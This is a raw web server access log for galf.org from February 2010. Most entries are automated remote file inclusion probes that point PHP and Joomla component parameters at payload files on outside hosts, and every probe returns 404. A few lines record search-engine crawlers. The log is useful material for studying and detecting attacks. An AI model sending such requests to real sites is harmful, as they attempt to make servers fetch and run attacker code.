74.208.14.52 - - [01/Feb/2010:00:13:32 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:13:32 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:13:32 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:13:35 -0800] "GET //_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:13:35 -0800] "GET /logs///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [01/Feb/2010:00:13:40 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://www.bokji.or.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:14:32 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:14:32 -0800] "GET /logs/access_090720.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:14:32 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:16:24 -0800] "GET /logs/access_091228.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:00:16:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:00:16:26 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [01/Feb/2010:00:16:31 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.calendarhost.com/bugtrack/api/soap/nusoap/lolid2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:19:11 -0800] "GET /bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:19:11 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:19:11 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:19:35 -0800] "GET /logs/access_091228.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:20:16 -0800] "GET /logs/access_100111.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:37 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:40 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:45 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:47 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:47 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:53 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:53 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:54 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:54 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:20:56 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:21:04 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:21:09 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:21:09 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:21:20 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.3.94 - - [01/Feb/2010:00:21:23 -0800] "GET /logs/access_090615.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:00:23:25 -0800] "GET /logs/ HTTP/1.0" 200 4926 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.207.25 - - [01/Feb/2010:00:23:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:00:24:50 -0800] "GET /logs/access_100201.log HTTP/1.0" 200 7267620 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:25:26 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:25:26 -0800] "GET /bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:25:26 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.207.8.238 - - [01/Feb/2010:00:26:03 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.207.8.238 - - [01/Feb/2010:00:26:04 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
77.79.246.80 - - [01/Feb/2010:00:26:29 -0800] "GET /bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:26:29 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:26:29 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [01/Feb/2010:00:27:10 -0800] "GET /logs/access_090720.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [01/Feb/2010:00:27:10 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [01/Feb/2010:00:27:10 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.121.204 - - [01/Feb/2010:00:27:40 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.121.204 - - [01/Feb/2010:00:27:40 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.121.204 - - [01/Feb/2010:00:27:40 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.121.204 - - [01/Feb/2010:00:27:42 -0800] "GET /logs/access_090720.log///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.121.204 - - [01/Feb/2010:00:27:42 -0800] "GET //_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.239.121.204 - - [01/Feb/2010:00:27:42 -0800] "GET /logs///_test_holidays.php?APB_rp=http://atlantadigital.com///sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:28:16 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.25 - - [01/Feb/2010:00:29:13 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.79.246.80 - - [01/Feb/2010:00:29:15 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:35:50 -0800] "GET /logs/access_100111.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:00:37:22 -0800] "GET //bbs/write_update.php?board_skin_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:00:37:23 -0800] "GET /logs/access.log%20%20///bbs/write_update.php?board_skin_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:00:37:23 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:00:37:52 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:00:37:52 -0800] "GET /logs/access_100104.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:00:37:52 -0800] "GET /logs/access_090629.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:00:37:52 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:00:39:47 -0800] "GET /logs/access_100125.log%20%20///bbs/write_update.php?board_skin_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:00:40:08 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
200.199.242.22 - - [01/Feb/2010:00:42:37 -0800] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.15.149.75 - - [01/Feb/2010:00:44:34 -0800] "GET /logs/access_091019.log/index.php?option=com_custompages&cpage=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.15.149.75 - - [01/Feb/2010:00:44:34 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.15.149.75 - - [01/Feb/2010:00:44:34 -0800] "GET /index.php?option=com_custompages&cpage=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
72.15.149.75 - - [01/Feb/2010:00:44:34 -0800] "GET /logs/access_090907.log/index.php?option=com_custompages&cpage=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:00:46:11 -0800] "GET /logs/scripts.log HTTP/1.0" 200 1793006 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.15.149.75 - - [01/Feb/2010:00:46:13 -0800] "GET /logs/access_091019.log%20/index.php?option=com_custompages&cpage=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
151.8.79.19 - - [01/Feb/2010:00:46:24 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [01/Feb/2010:00:46:24 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
151.8.79.19 - - [01/Feb/2010:00:46:27 -0800] "GET /logs/access.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
75.126.213.58 - - [01/Feb/2010:00:46:47 -0800] "GET /logs/access.log///bbs/write_update.php?board_skin_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [01/Feb/2010:00:48:28 -0800] "GET /logs/access_091012.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [01/Feb/2010:00:48:31 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
151.8.79.19 - - [01/Feb/2010:00:48:31 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.213.58 - - [01/Feb/2010:00:48:36 -0800] "GET /logs/access_100125.log///bbs/write_update.php?board_skin_path=http://nairabuy.com/templates/icon/fx29sh/Fx29ID.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.139.134.238 - - [01/Feb/2010:00:51:39 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.139.134.238 - - [01/Feb/2010:00:51:39 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.139.134.238 - - [01/Feb/2010:00:51:39 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
67.139.134.238 - - [01/Feb/2010:00:52:16 -0800] "GET /logs/access_100125.log//bbs/write_update.php?board_skin_path=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
221.143.40.35 - - [01/Feb/2010:00:52:31 -0800] "GET /logs/access_090629.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [01/Feb/2010:00:52:31 -0800] "GET /twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [01/Feb/2010:00:52:31 -0800] "GET /logs/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [01/Feb/2010:00:53:06 -0800] "GET /logs/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.45.123.132 - - [01/Feb/2010:00:53:07 -0800] "GET /logs/access.log/ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
201.45.123.132 - - [01/Feb/2010:00:53:08 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vlg.mebbery.ru/files/Id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
221.143.40.35 - - [01/Feb/2010:00:55:29 -0800] "GET /twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [01/Feb/2010:00:55:29 -0800] "GET /logs/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [01/Feb/2010:00:55:29 -0800] "GET /logs/access_090629.log/twindow_search_rank.php?shop_this_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:00:55:59 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:59:46 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:59:46 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:00:59:47 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [01/Feb/2010:01:00:53 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:00:55 -0800] "GET /logs/access.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:00:55 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:00:55 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:07 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:07 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:07 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:01:20 -0800] "GET /logs/access.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:01:20 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:01:20 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:21 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:21 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:23 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:23 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:23 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:24 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:24 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [01/Feb/2010:01:01:24 -0800] "GET /logs/access_090720.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [01/Feb/2010:01:05:00 -0800] "GET /-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [01/Feb/2010:01:05:00 -0800] "GET /logs/access.log/-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.40.23.86 - - [01/Feb/2010:01:05:00 -0800] "GET /logs/-auto%20delete_all.php?board_skin_path=http://www.socialworkleadership.org/sw/leadership/reports/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:06:12 -0800] "GET /logs/access_090720.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.150.132.139 - - [01/Feb/2010:01:06:12 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://blog.satyammatrimonial.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
